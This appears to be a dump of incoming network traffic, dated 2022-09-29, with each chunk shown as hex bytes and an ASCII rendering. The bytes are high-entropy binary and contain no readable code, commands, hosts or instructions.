                                                                                                                                                2022-09-29 12:51:53 UTC31237INData Raw: f0 b9 26 ed fa 1a 5a be 54 33 b0 be 17 57 16 a2 bf cb 27 ec 4e 7d 22 bf 32 bc 8f 1e a2 02 8a 47 03 24 e5 5e e2 92 bd ac 3f a9 94 1d 57 59 8e 2f 3c 86 f7 77 91 fb ac ab 77 fe 0f 37 34 10 ec 99 73 ec f3 10 e1 34 13 dd d0 16 a5 6c aa e5 5b 90 03 1e 90 52 2b e4 5b 03 9f 4a 89 c2 92 e1 ac e8 42 b2 c2 c0 87 4c f9 35 15 82 1c 69 08 0b 24 b3 17 ad 08 1d b1 6b de b2 ca 58 3b a0 9d a9 d4 d5 fe e0 8b 92 12 15 14 ec 36 b1 6f 5a a0 ae 4a 3e bc 59 1f 80 c2 b7 31 32 95 3d 77 ed cb 78 bd db 0c f7 c2 15 2a de 43 b1 88 f7 ac 50 55 0f 3d be 06 66 70 f9 6f b9 ec 26 42 77 5c e6 46 be 3a 81 7b 2f 04 68 12 43 00 01 e7 94 55 7c 18 b9 d4 ab b8 7e 46 98 56 4d 80 4b 0a 66 db de 1b 48 0f b5 0f 22 26 63 7f f5 2a ff 61 fe d3 57 8e 6f a5 16 6b ed a0 44 63 34 1e 3d cc 5d 61 88 20 d7 78
                                                                                                                                                Data Ascii: &ZT3W'N}"2G$^?WY/<ww74s4l[R+[JBL5i$kX;6oZJ>Y12=wx*CPU=fpo&Bw\F:{/hCU|~FVMKfH"&c*aWokDc4=]a x
                                                                                                                                                2022-09-29 12:51:53 UTC31253INData Raw: 52 df 94 c7 46 87 8d 4c d8 64 82 80 3b 61 fe 6b 16 54 a0 79 7d 20 51 4a 90 e9 69 e1 7f 63 54 bc 0b c0 7c cd 1b a1 58 6f 9b 95 9c b2 27 5c 78 af fb 55 a6 1d 28 dc c5 da c8 5e fd ed b7 68 b1 77 d1 cd 0e 77 52 9e 82 a9 b2 7b e6 e7 cb 65 b8 39 9d af 83 50 32 22 01 e7 6c ad 0d 56 8f f4 8b 64 cf 39 be 1b 27 e9 79 bc 4e 7e 26 d9 32 07 6f 3b 6f 0a d6 10 45 40 1b 2d f7 c3 0a c9 6c 5d 52 be 4b b9 90 97 aa 78 59 47 e2 77 a4 20 76 dd 78 fc 86 7a ef 58 cd 80 10 84 4e 30 34 12 e5 43 16 60 8b d8 42 04 10 1a 7c 24 93 31 68 28 9f a7 c4 d7 a8 53 42 7d ad fc 49 2a f9 b0 80 5a b1 7c aa 5d da 12 94 fe 3a 1f a1 bc 02 6e a7 17 27 83 53 40 14 55 d8 56 f6 23 0c 74 95 39 60 c9 b5 4e 0d f4 c6 f0 98 58 44 d5 45 8f a2 92 5a 49 9f 9c 41 10 a2 bb a0 db cf c4 28 7a af 3b 14 51 fb 12 cf
                                                                                                                                                Data Ascii: RFLd;akTy} QJicT|Xo'\xU(^hwwR{e9P2"lVd9'yN~&2o;oE@-l]RKxYGw vxzXN04C`B|$1h(SB}I*Z|]:n'S@UV#t9`NXDEZIA(z;Q
                                                                                                                                                2022-09-29 12:51:53 UTC31269INData Raw: 75 13 70 49 03 3e 44 6f 10 fa 92 8b b2 6b 91 b2 a3 97 42 db 2e da d2 88 e2 c2 79 01 9b 40 5d 52 56 e0 c1 23 86 43 23 53 80 ef 13 20 e9 50 83 e9 5d e7 44 1f 3b 36 bd 93 ab 6f 8b 3c 50 1e 42 46 4d 31 18 28 de f1 81 3f 0d dd 63 af 5b 12 e8 4a b9 e9 c4 2a 54 89 2a 90 37 29 bf 38 7b e4 41 ab c9 31 bf 7e af ca 91 90 b0 69 ac 32 19 75 c8 76 72 a8 5d ca a5 8b b5 5c 5c 78 78 56 15 3c 29 43 b7 a8 c4 8a 6c 45 a4 ea 16 7e 22 04 30 83 39 75 e3 f3 c1 e5 d3 9f 15 8e d8 1b 19 05 94 e0 8e cc 18 66 ab 86 5a 0f 34 cf ff 84 e4 5f ca 95 b1 7b 9f 52 00 e7 66 22 7e 36 17 2d d6 b5 10 58 44 98 82 6d 9c c3 16 cf db cb 74 2e 29 ef 84 37 be e5 e3 50 6f 63 12 3e 68 51 8f f5 8b ee 34 78 6b b2 ea bd 7b f4 8b e4 b5 99 75 16 64 5c ee 4a 79 65 d0 cc f1 28 5a 1a 40 7c 66 d7 50 a9 c0 77 d5
                                                                                                                                                Data Ascii: upI>DokB.y@]RV#C#S P]D;6o<PBFM1(?c[J*T*7)8{A1~i2uvr]\\xxV<)ClE~"09ufZ4_{Rf"~6-XDmt.)7Poc>hQ4xk{ud\Jye(Z@|fPw
                                                                                                                                                2022-09-29 12:51:53 UTC31285INData Raw: 88 4f 9e 84 11 00 ae d9 91 88 a8 55 c6 8a 8b 77 47 06 a6 18 24 8b be 44 20 c4 0e 0a 28 5b fc 27 99 54 8d a5 0f 35 ad 68 75 a2 0b 06 41 1c 23 b0 0d 85 f1 fa 3a cc f1 ef 3d e8 0f e0 8d 64 0a 2a 1a 0e c6 25 bd 82 0a 7a 1b e5 7c f9 0a e5 c4 c0 39 8c 4a 19 a9 30 43 4a 41 68 0b 48 e2 7a 38 41 68 d2 87 49 16 10 f8 11 bf eb 96 01 66 31 d6 18 c5 e2 1f 0c 2f c5 c1 a3 c5 8a 85 f9 73 0a ca 30 70 22 96 5e 8c 22 a4 48 81 d3 93 54 ca 2d df e2 e3 57 c2 53 36 fb b3 35 0d 3a 16 af 4a 99 62 9c 1f 98 da 01 39 f0 09 d6 ac d2 78 0c 2b ca f0 0c ed fd 8f 5f da ad 5f 93 58 2c a5 bf 85 f0 72 63 20 c6 ff 64 16 2c bb 46 a9 8d ab 58 e6 07 59 d5 a3 19 5a b9 b4 81 9d 6a 81 cb 86 c2 1e 9e 8c 16 58 bd ac 14 fc 74 61 3e 26 42 a5 bc 09 29 53 20 02 a7 8a cc 3a 98 a2 33 00 05 35 eb 0a 7b fc
                                                                                                                                                Data Ascii: OUwG$D (['T5huA#:=d*%z|9J0CJAhHz8AhIf1/s0p"^"HT-WS65:Jb9x+__X,rc d,FXYZjXta>&B)S :35{
                                                                                                                                                2022-09-29 12:51:53 UTC31301INData Raw: c5 76 b7 5d 79 9c 2b 33 95 39 44 a4 e6 47 64 70 dd e6 5b bc 0f 82 62 2d 35 b2 b9 09 4a 40 73 f2 f1 31 68 31 03 18 9d 13 82 b2 fc 48 81 69 97 b1 62 2e eb 43 48 2c 98 b3 90 8d 43 f1 0e 06 fc 71 4d dc ff 8c 59 d3 ed 20 db 41 30 69 b8 a6 1b 8c 22 96 93 62 6b f1 56 bf db 22 f9 87 ea b5 4e cd 96 84 3c cb 00 05 2c 3a 0f 66 14 1e bc 7f 37 9c a4 3d 1c 5b a1 41 00 90 1c 58 f2 7f b4 02 d3 5f 7e 37 c5 d4 bf 57 ee 9d b0 90 68 69 04 82 39 e9 6d dc 8c 8d 4f cd cb e6 f8 c5 8b 65 82 36 45 41 31 a9 f0 45 ed a7 68 6d 00 a9 d4 ca e3 3c 5c b4 3a 59 12 97 61 8a bf 07 c4 7d dd 44 da b0 4f 46 05 8f b2 22 49 1a 14 bf 30 a6 21 25 4c 04 6f 3c 1e 40 d7 6b fd 6e 24 11 18 cc b1 6e a2 72 ea 39 a6 42 83 23 ef ee d6 46 cd 59 85 24 c0 0c e4 f7 cd 85 51 6e 50 c0 22 31 21 7c 7e 62 c3 3a b0
                                                                                                                                                Data Ascii: v]y+39DGdp[b-5J@s1h1Hib.CH,CqMY A0i"bkV"N<,:f7=[AX_~7Whi9mOe6EA1Ehm<\:Ya}DOF"I0!%Lo<@kn$nr9B#FY$QnP"1!|~b:
                                                                                                                                                2022-09-29 12:51:53 UTC31317INData Raw: 37 df 06 3d 6c 87 a5 7b 5f fa df 74 56 4c f1 d7 da ef ce e9 1b 69 ed d9 0b b3 a8 df 24 81 b9 9d 40 df ec 3a 7a eb fe 0e 79 bc e7 30 47 fd 0f fe d2 60 f9 e4 ae b0 90 16 24 12 a3 b5 64 7b da e7 9d 36 c1 0a 39 0b f1 f8 e1 84 e4 2b e2 9b 05 53 23 91 21 f3 f7 e1 2a 49 c5 1b d8 f8 f8 e9 ea 49 5d d8 ff 24 32 5b 40 a6 98 f7 7c a1 a1 a4 eb 52 03 ca c0 d9 df 9c 16 c3 6d 71 d3 a7 06 a7 a8 7d 05 89 5e ed 6d 8a 40 4d 9c 92 9c dc 18 e7 42 3d a6 50 02 e9 98 9a 69 bd 7e 6e 36 dc df 82 49 01 fd f6 61 0f 6b 07 0e 20 0f b9 00 8b 55 9d 77 52 ad 75 c0 1d 4b 7d 43 ea 6a 8b 30 f9 09 c9 44 23 6b 67 7b 7f d4 18 7d 54 61 d4 94 35 3d bf 0e 98 c5 db a6 bb 96 46 59 00 98 63 ab 80 36 53 0b 4f 2d bc 17 d4 a5 e7 d5 fb 9a 52 c8 7d 8b 42 25 7e 1a 3d 9d 9d 99 94 c6 7f bd d0 10 91 6e 19 ba
                                                                                                                                                Data Ascii: 7=l{_tVLi$@:zy0G`$d{69+S#!*II]$2[@|Rmq}^m@MB=Pi~n6Iak UwRuK}Cj0D#kg{}Ta5=FYc6SO-R}B%~=n
                                                                                                                                                2022-09-29 12:51:53 UTC31333INData Raw: 7b 66 08 c4 bf a4 11 6d 14 14 11 79 a1 14 ae b3 04 05 a6 40 5f 55 38 aa 6d 7a 72 bd 66 36 fc 4f 8f fc aa cb 9f bc a2 a1 42 03 77 bb 50 b7 7c 26 af b7 6c 58 bd 2a f8 b1 15 f1 a8 d6 b2 56 e4 51 91 23 63 71 1d 0c 0c da d5 bc 48 d1 26 31 0a 11 2c 65 0e d2 26 e0 05 74 60 60 e9 63 6a 6f 55 74 67 cb 14 c1 f7 d4 d1 10 23 01 88 28 24 0b 60 dd e9 5d 5b 87 81 82 b1 ff bd 75 98 c2 03 56 ce 50 d2 68 cb 1a 3f cb fd bc 0a 1f 45 36 dc 20 e6 6e 5f f9 dc 4a 3c 31 90 8e 9f 94 a7 96 9b 50 ac 10 61 a9 58 d2 bd 33 91 89 6f 78 a1 f0 d2 6e ba e1 1e c6 c8 f2 c5 31 9f 79 87 90 20 8f ee 65 b6 d0 ca 7a cb 61 af f9 06 96 c0 a7 11 9e 4e 2d 90 db e6 83 2b 81 9e 9f 18 af cf df ea 86 f0 4c 93 2e 15 8d 34 89 db ce 7f 2a c3 41 4b 72 8d 8c c4 87 d6 9e 6a 07 2f 3c 15 71 a1 53 7a 80 9d 03 af
                                                                                                                                                Data Ascii: {fmy@_U8mzrf6OBwP|&lX*VQ#cqH&1,e&t``cjoUtg#($`][uVPh?E6 n_J<1PaX3oxn1y ezaN-+L.4*AKrj/<qSz
                                                                                                                                                2022-09-29 12:51:53 UTC31344INData Raw: 98 83 c6 e5 42 fd 0c 6a 63 f3 d7 b2 65 47 09 ac b4 69 c8 e0 94 5a 78 58 eb 82 49 d4 91 cc 1a 14 40 db ea e6 cf 5e 7d ca 50 74 e8 91 58 d9 1d 22 e4 24 7f d3 fd 1f 5b 87 f1 2d 3e 43 a5 2c 58 bb f8 75 71 75 30 97 cc d7 19 a0 8b 06 37 6f c2 11 ba e2 47 c7 b8 c9 15 e6 f8 a8 a9 d2 6a b5 2b 7f c3 d2 1b 8a 9c 05 6b 92 05 a1 09 e7 6e ca fd cd b3 17 01 58 34 40 50 7e 0c a8 d9 a8 2f 62 9d c4 fe f7 5b 7a 8c 01 cd 95 55 d2 28 3b f1 6a cd a2 32 5a 7e 18 84 ee 23 51 84 f0 fe a3 a5 80 10 dc 42 5a df db eb 6a 7b cc 51 3f 45 c2 3c fb 35 23 c4 f8 93 27 87 49 b4 f4 a1 d1 51 92 53 27 c1 14 0f d3 ad ff bd b6 48 2a 11 f0 84 55 c7 ba 36 0e 60 09 6f 8f af 8d 8e 5a 00 5e 58 9f 09 15 4d 4c 85 4b 56 86 bc 8b 0b 06 b9 3f 96 53 62 ac b5 27 da e7 fe 8e 3b 23 18 26 b2 4b 01 8e 83 d6 9d
                                                                                                                                                Data Ascii: BjceGiZxXI@^}PtX"$[->C,Xuqu07oGj+knX4@P~/b[zU(;j2Z~#QBZj{Q?E<5#'IQS'H*U6`oZ^XMLKV?Sb';#&K
                                                                                                                                                2022-09-29 12:51:53 UTC31360INData Raw: d6 13 8a 79 75 ec 2b 7f f4 31 4b 3b 03 cf 6c 1b 0b ca de dc 2a 29 d5 0e 32 83 a6 d3 29 4e 20 83 12 8a 7a d1 cd 12 4d 22 33 73 a9 6e 81 77 93 37 00 c9 fd 81 99 79 d9 91 3c 79 85 cc 9c fe 37 b9 07 f1 db 5f f8 8f 49 f0 41 af e6 9a 30 48 f3 3c c1 97 31 8d 9f 5c 06 f5 1e 74 2b c3 58 6b 6e 4d e0 3e a8 9c 37 ed 28 3c 96 56 87 3e 33 25 0d 17 05 9a 08 01 43 a9 b6 f6 ff 05 b9 be 3b 21 93 29 cf 11 ad e8 b6 dd b6 16 94 c1 23 72 24 eb 71 71 2a 14 c4 9d ee 56 b7 38 69 66 b5 76 3a 2d b1 7f ce 22 9d c7 d3 9a b2 6e d6 2c a2 da ab d4 7e c5 61 2e b5 29 03 24 60 d4 2e 7c 18 a0 75 43 d7 1f 54 4f d2 b4 c6 63 b6 a9 36 c3 ee 35 4e b3 42 27 93 22 ce 8f 58 89 bf b0 be 3e 77 92 6d 75 8a 7f cc 4e fb 50 d3 f4 0d e5 ff 3e 54 46 3b 69 b7 66 ff 79 ba 03 00 2b da 4e 37 aa f9 44 be 43 38
                                                                                                                                                Data Ascii: yu+1K;l*)2)N zM"3snw7y<y7_IA0H<1\t+XknM>7(<V>3%C;!)#r$qq*V8ifv:-"n,~a.)$`.|uCTOc65NB'"X>wmuNP>TF;ify+N7DC8
                                                                                                                                                2022-09-29 12:51:53 UTC31376INData Raw: 48 10 04 a0 2f 86 2d 14 76 0e b3 c0 a3 1b 9a 69 f3 76 13 e7 2e fd ec 96 40 aa 1b 0b 94 3e 60 b3 4b a1 b0 19 65 dc b6 13 d1 79 1e 2c 6a 00 39 1c ec 23 fb 23 82 51 1a de 7e b4 d5 24 28 dd e0 c1 bc cc 09 c8 4d 2c 87 04 1d 10 c8 f6 23 91 41 ca 11 3e a3 a7 f0 95 b6 f4 2d 80 fd fa fc e0 26 e5 98 ed c6 e1 16 14 11 90 dc 4e 39 d7 af 9e 58 47 e3 86 46 3d 5d f8 61 b1 0d ff ce 5e b0 aa 85 a8 f1 0e 6a ed a7 d0 c5 c9 f8 47 39 26 03 79 d8 88 c8 0b e9 4b e2 3e 15 d5 6a bc 63 92 03 33 6e a4 ef 0f 79 97 45 c6 fc 84 8f 0e b6 b9 1e 21 01 e2 5f c9 d4 3f 41 b6 82 ee 67 74 b1 d5 83 18 86 db da 6d dc cb bf fe b3 ea c1 e8 56 a9 0e 5f 12 21 9e 3b 38 13 d9 ab 5f a5 10 7e 86 a2 89 a5 5d 6c f7 16 5e fd 4c 11 26 54 53 36 a4 bf 57 e9 cb 05 81 56 fa f8 bb 4a 66 86 59 67 22 3e a7 3a 4b
                                                                                                                                                Data Ascii: H/-viv.@>`Key,j9##Q~$(M,#A>-&N9XGF=]a^jG9&yK>jc3nyE!_?AgtmV_!;8_~]l^L&TS6WVJfYg">:K
                                                                                                                                                2022-09-29 12:51:53 UTC31392INData Raw: e7 37 2f 69 fa 6a 16 76 09 75 f3 cf 62 d1 bb 2e 35 04 93 70 8d 7b d4 00 9a d9 ab e5 94 fd 2f a5 a6 cd 84 aa c7 ce 11 3e a8 b4 13 6b 6a b8 c8 8a 7f a9 4d 44 4d 53 9b b8 e8 ad 35 7a 8b c9 91 7c 4a ab 41 bf 5e e8 d6 e2 ff 84 3f ff 18 36 eb 7f 54 76 21 48 0d 76 71 aa f5 d4 47 5c c7 bd 11 68 17 15 af cc 4d be 44 27 ff 78 74 f2 dc 5c 54 8d b6 5d b0 d6 f0 6c 0e 84 51 61 0e 70 81 89 b5 b7 46 63 0f 6c 71 19 98 22 51 39 c9 ae 3d b1 ba ff d9 41 30 0f 3a ff cf c9 d5 95 7b a9 5f 7f cc 10 57 bc b5 00 7f 22 3c 0d 17 33 03 82 d4 3a 57 80 a8 4c 7b 75 57 0a 06 04 e2 bb c7 95 10 e1 1c 2d 7d 85 d3 28 2b 85 35 23 ad 70 9b 57 9a 1e f3 e4 75 97 22 8f fd b5 67 d3 69 fc 4f b1 78 02 5f 52 c7 d1 39 83 3f f0 fc be 6f 6c d3 81 c9 e6 a7 c0 17 1d 1a cd 6e 34 3c 1a 69 2e 3d 16 ed 56 ab
                                                                                                                                                Data Ascii: 7/ijvub.5p{/>kjMDMS5z|JA^?6Tv!HvqG\hMD'xt\T]lQapFclq"Q9=A0:{_W"<3:WL{uW-}(+5#pWu"giOx_R9?oln4<i.=V
                                                                                                                                                2022-09-29 12:51:53 UTC31408INData Raw: f5 6c 4c 14 a0 ef c2 ba 55 d4 6f 8e af 85 7d d5 9d 97 fe 74 40 e6 51 de 9e b0 cc 12 e3 53 b6 d1 44 90 67 a6 22 4e 64 99 e0 70 f8 1b 67 95 e6 12 e7 95 df 13 88 a9 d3 4e d4 ac 11 33 49 97 68 cd f8 87 4a 97 2b 89 98 ec 4e 16 28 9b dc 59 72 ab 85 75 7c f3 0e b1 55 93 b8 56 67 8e 9a 4b 49 07 00 ec 45 a5 be 3c 3d 5a ee 64 2c c4 3a 4c 47 77 28 5a 86 63 6c c9 83 32 6a c3 33 aa 1d 9e 8f 9b fa 88 83 d9 1a 94 5e 2f 4b f2 dd 61 4c cc ca b9 2e 3d 7a 63 eb bf dd f4 2b 44 83 ee 79 6e f5 bc 3b 6b b5 01 6b 39 ac 36 4f 26 4f c2 16 55 a7 7e 26 01 52 98 eb 6f a5 12 12 ca a4 dc c8 4f 8f 1c a8 16 eb 89 fb 30 29 03 b7 47 3c df 44 7b 42 2f f9 6e 04 30 a8 a0 20 e0 e0 4f 93 8b d1 99 5d a5 f2 99 3c c3 5a 5c 7b 4e b2 62 82 fa 55 ab 20 f5 82 58 4f ba a8 82 61 06 1c d8 51 30 43 1e 70
                                                                                                                                                Data Ascii: lLUo}t@QSDg"NdpgN3IhJ+N(Yru|UVgKIE<=Zd,:LGw(Zcl2j3^/KaL.=zc+Dyn;kk96O&OU~&RoO0)G<D{B/n0 O]<Z\{NbU XOaQ0Cp
                                                                                                                                                2022-09-29 12:51:53 UTC31424INData Raw: e1 70 14 5b 3c 07 10 b4 e7 58 92 ce 25 d7 50 c7 3f 8b 36 58 1e 8b b5 4d 0b eb cc ee aa 03 47 ab 3b a8 9d 50 a1 95 7a 1b 0c 6b 36 f8 83 90 9d 4f ab 51 c3 36 9b 8c 28 b8 0a 1a e5 33 8f f8 bc 43 49 c2 76 93 df db ee 24 95 d9 a6 71 15 1f 59 12 e0 96 6c 35 70 ce 96 6f 51 c2 b0 c3 f3 16 ca 3d 25 ed 41 9d 6b d9 77 42 64 44 5b 04 21 74 da 7e 33 b4 4c 43 51 ba ab c7 ae d3 00 66 2e 0c 7e 19 8f da 65 66 76 52 f7 f1 d7 b2 e0 2a e7 e1 00 a2 53 72 20 b5 cc 20 07 d6 98 de 69 fe cf a5 0a 4e 9e df eb dd 58 16 13 7c 34 63 78 d7 1e d0 a8 c2 e2 9f 1c 71 62 e2 e9 a2 0d 3f 2a 79 cc 6b e7 d6 ef d9 49 1c b5 db 3e 90 ff 45 6e 4b 3c 88 8a 25 34 ea 08 cd a2 a6 17 41 76 fc b9 40 a0 2c 08 4e 5e 6c eb a0 00 8e 5b 1c f2 fe f5 3c 03 e2 00 a7 85 8c 4a 0f 98 96 8c 89 20 5c 3e d1 32 18 ce
                                                                                                                                                Data Ascii: p[<X%P?6XMG;Pzk6OQ6(3CIv$qYl5poQ=%AkwBdD[!t~3LCQf.~efvR*Sr iNX|4cxqb?*ykI>EnK<%4Av@,N^l[<J \>2
                                                                                                                                                2022-09-29 12:51:53 UTC31440INData Raw: 5b 81 18 2c 4a 58 80 be 38 c8 0e 77 6a b3 8d 20 0b 74 96 27 ac 0e 31 8f c2 0b 49 d4 39 7c a7 77 ad e7 91 5c 66 2d 5c 56 16 28 58 10 0b 51 f9 8b c5 26 d9 46 38 10 b2 53 a6 fa 03 f7 0c 94 5b 79 92 3f 5f c6 23 14 aa fd b7 5d 73 13 cc 9b 93 36 d6 91 66 b8 62 fc 35 59 e1 3f 35 ee b9 eb 46 56 8c c8 50 7c 58 c5 ff 4d 51 8d 71 fc d5 38 a0 6d f9 cd ec 6f 09 0e a1 d9 ca 41 ad 38 58 ad a9 79 10 70 5a 60 98 08 20 c5 bb 0d 0f 72 45 5e 43 3f 5b 21 c6 50 97 76 c3 7a 54 b6 6e fc ab 2e 49 64 39 d2 53 3a 7b f8 cb 6f 9a 4a 80 06 90 5c ff f3 e7 34 5a f2 7e c3 e6 f0 07 84 29 1f 93 f4 4a 10 cb 75 2e 56 ec 98 32 55 1b 6b c9 da 77 b7 17 b8 91 93 fd 33 94 61 8f 81 81 2d 92 2d 94 19 ef d3 01 9e d5 32 1a 77 8a 14 4c c0 6a 67 eb 86 69 ce 3f a8 70 14 ef 3b 73 a4 9c 2f e3 f4 9c c7 12
                                                                                                                                                Data Ascii: [,JX8wj t'1I9|w\f-\V(XQ&F8S[y?_#]s6fb5Y?5FVP|XMQq8moA8XypZ` rE^C?[!PvzTn.Id9S:{oJ\4Z~)Ju.V2Ukw3a--2wLjgi?p;s/
                                                                                                                                                2022-09-29 12:51:53 UTC31456INData Raw: 09 12 d5 7c 8e 8f 2c 7d 6d e1 76 9d 0f 42 32 bf 52 c4 38 a5 1e da ec eb 7d a4 89 13 aa 27 54 49 a8 b1 44 67 6f 98 c0 df fd 98 f1 1e 4e 68 21 89 7c 6a 67 5c 22 58 c4 5f 09 ca 0e 96 2f 63 ae f5 14 58 a6 92 2e 09 f3 a6 32 e1 b8 4d 7f a0 62 f3 dc 4c a8 d2 6a aa 1e f9 55 12 6d 95 3f 7c 37 23 94 46 75 cc 29 08 e6 d2 7d 56 18 8c 64 c4 aa 7c e5 f3 c4 50 bc 19 1d 18 ad 51 ab ba c5 2f 66 ad d4 87 27 18 31 ea 8a 0f 36 e4 eb 00 f8 83 4a df 91 10 8a be df de 62 55 08 29 59 80 c0 91 38 14 9b 9b c9 52 b7 ea b7 32 1d 4f 20 19 45 8f d8 81 13 8d b9 ae 26 5a 17 22 c1 55 16 0c a9 75 84 c2 1f 41 6b 63 7f e3 ad f1 87 03 f3 bb 4c b6 f7 a1 d8 2f 3a 76 f3 d1 75 9c cc 79 7b 6b ce cc 5b 88 14 36 b2 81 3d 77 06 61 d2 bf 13 f5 5b 70 91 04 d7 1c 72 62 a9 14 5d c2 2d a6 e0 28 45 3a bd
                                                                                                                                                Data Ascii: |,}mvB2R8}'TIDgoNh!|jg\"X_/cX.2MbLjUm?|7#Fu)}Vd|PQ/f'16JbU)Y8R2O E&Z"UuAkcL/:vuy{k[6=wa[prb]-(E:
                                                                                                                                                2022-09-29 12:51:53 UTC31472INData Raw: ca 8b a2 fe 85 c2 6c ce eb 4e b8 e2 3b 3e b2 3f 07 e2 d8 54 47 03 cd b2 06 95 6e fe 7b 8f d0 75 35 86 8f 19 78 b1 4e 19 45 af 80 29 dc 20 4d 43 97 2b 53 8a da b2 2e 71 20 d9 d1 bf dc d7 4d 48 b0 e7 ff 9f 50 8d c5 c0 18 01 5d 34 ba 4b 8a 53 bb ae 2e 97 86 f3 d7 0b 5b b2 30 be 8a 4e d0 f1 ee 54 93 d5 ac db 86 0d 8c 7c 7d 75 09 d1 2b 7d f5 29 0a 79 96 ac f0 24 b7 a6 12 fb bf 13 30 58 d4 c5 34 67 43 58 e0 01 0a 75 d3 63 a5 b9 ac 86 ac d8 42 75 9f d6 09 ff fa 12 92 e3 05 68 1f ea 3d b5 79 7b 28 9a 05 d3 2e 5d aa 28 3a 44 9a ad 94 1f cf e3 8d e0 47 4d bb 54 64 ac 18 1b c4 cf bf 83 26 a0 0e b9 f8 47 f4 a6 7e 45 a6 15 b4 75 2f 9a 3d 67 51 5e 80 93 81 d6 7d 27 8b 9a 61 d7 4e 4e ba f9 25 8b 58 6a cb 54 24 69 6e 34 68 1e 7e 66 19 64 13 e0 dc 29 39 1d 26 71 01 55 fc
                                                                                                                                                Data Ascii: lN;>?TGn{u5xNE) MC+S.q MHP]4KS.[0NT|}u+})y$0X4gCXucBuh=y{(.](:DGMTd&G~Eu/=gQ^}'aNN%XjT$in4h~fd)9&qU
                                                                                                                                                2022-09-29 12:51:53 UTC31488INData Raw: ab 39 d8 ed d4 99 5a 58 2b bc 0b 9e 29 bf 0f 2a d6 6f 27 c4 13 a6 3a 7d 92 27 83 de ed 91 2a f9 d8 1f b7 c7 1a 15 f2 65 15 0e 07 17 4f 00 0a ec 3f 21 4f 49 cf ff 0d 28 2c 3e f4 a1 3d 75 6e 57 84 1d e8 a0 16 db 6b fe 9f ad fe 57 fe 20 d0 0c 15 24 4c 0e 63 59 0d 08 16 ea ce 01 05 0b 2f fb 2b ed 21 92 a7 f1 85 b8 02 ba 35 68 91 c6 66 af 15 ee a9 64 60 86 69 28 1d 4a ec e5 9c 40 13 c4 66 1e 09 97 59 94 fe 40 76 2e 76 36 13 e9 17 1e 4a 2d f2 0d 87 9c bf 1b f0 67 af 97 36 35 3d 02 77 01 71 6e 54 65 c1 09 f8 be 28 04 fe e0 7c 77 6d 81 37 d2 f7 7b ff 77 99 8f e2 20 f2 95 42 08 14 d0 7b e8 9a 88 f3 65 d3 33 e4 c7 ea 2d 3e 42 dc 7b e2 d5 a1 ef 7c d0 0f f4 98 f7 2e b6 4f a1 ce 17 94 00 3f f9 12 a8 c1 e7 d1 fc 02 ed 1f 0d e8 0b da c6 a7 89 d9 5e 0d ed 04 14 2a 07 d5
                                                                                                                                                Data Ascii: 9ZX+)*o':}'*eO?!OI(,>=unWkW $LcY/+!5hfd`i(J@fY@v.v6J-g65=wqnTe(|wm7{w B{e3->B{|.O?^*
                                                                                                                                                2022-09-29 12:51:53 UTC31504INData Raw: 5c f6 4c 99 70 7d f6 52 e7 95 9c 21 70 b8 8f 01 19 fc 1b f6 90 1f b5 f8 a2 b9 11 2e cf 8c 18 62 95 de c1 3b f5 ba 22 14 f9 fd eb 95 ac 36 83 4c bd 73 d0 21 32 af a7 94 7b 87 91 7b 80 1b 9a 2b 2c ea 99 99 52 01 70 94 d8 fb a6 1b 31 6f f1 b7 f6 e8 71 40 43 8e 34 60 3e 55 51 08 fa 13 bd be 96 11 14 78 ee 2f af 32 41 88 6b a6 f8 ba 5f 27 8a 65 91 cf f7 3a bd 84 6f db 79 8e 1c 68 e0 d7 c3 b5 81 7d d0 85 d1 6f 5d be aa 36 99 21 17 0c 78 72 97 ae cd 6b b1 b2 10 ea 06 1a 53 72 a3 b3 2d 7d f4 39 ac 7f 49 b8 e4 03 37 a8 d6 36 17 0e 53 c0 79 a0 d8 0f db 2b 8d 4f 3a 1e 59 cd c2 ef 0f ef a0 87 73 c9 f3 2e 5c 73 62 18 b6 7a 04 57 7b 26 89 00 1d 45 3d 3a b5 48 6d 28 4a dc 83 7d 69 f4 a6 07 a8 2d 44 04 69 b6 08 9f c2 60 8a 52 4a 4e d6 0e 3b 43 62 08 e9 9d 1a 59 df 21 8a
                                                                                                                                                Data Ascii: \Lp}R!p.b;"6Ls!2{{+,Rp1oq@C4`>UQx/2Ak_'e:oyh}o]6!xrkSr-}9I76Sy+O:Ys.\sbzW{&E=:Hm(J}i-Di`RJN;CbY!
                                                                                                                                                2022-09-29 12:51:53 UTC31520INData Raw: 4b 26 b6 3d 1c 5a 32 7e 88 21 7e 18 f4 6f 78 42 21 b0 b6 e9 5c 6a 7d 0f c3 6d 51 21 d6 58 68 a7 99 bd a4 42 1f 50 d6 5f b5 44 97 90 69 0e 67 aa b1 6c 52 51 75 2f e4 7b 41 82 83 51 af 5e 22 5d d0 c6 25 07 bd dc e4 ee df e3 ed 05 3d 38 cc 18 8b e9 da fa cc 8e 39 8e 52 da 74 1c 7c 16 49 94 cb e3 96 73 60 df 9c 6e 91 db f9 5c b8 70 ae d0 1c 4a a1 8c 0e 48 15 a0 42 db b7 7b fc 91 f2 61 56 8a fe 58 87 ae d2 0d da aa 8b 65 7a 2d 7b 0c d7 61 74 af f1 94 aa 0f 1c 6b b2 3f a8 ae 23 1c db d2 f9 a2 28 d9 82 c6 47 82 b3 d9 52 7c 64 0a cd b2 e8 a8 63 7a 2a 71 81 12 4f 01 28 7b 62 1d d2 73 44 d5 0a 3c ec a0 f5 2f 8b 4f 19 a9 41 b7 08 26 6b b7 ab c2 b8 d9 50 42 d5 5a cf 7f a1 33 54 b1 97 43 7f 14 ab 23 8c 8f 06 39 67 fa 26 bc 78 34 3b 41 95 c7 48 2d 07 76 31 30 28 68 05
                                                                                                                                                Data Ascii: K&=Z2~!~oxB!\j}mQ!XhBP_DiglRQu/{AQ^"]%=89Rt|Is`n\pJHB{aVXez-{atk?#(GR|dcz*qO({bsD</OA&kPBZ3TC#9g&x4;AH-v10(h
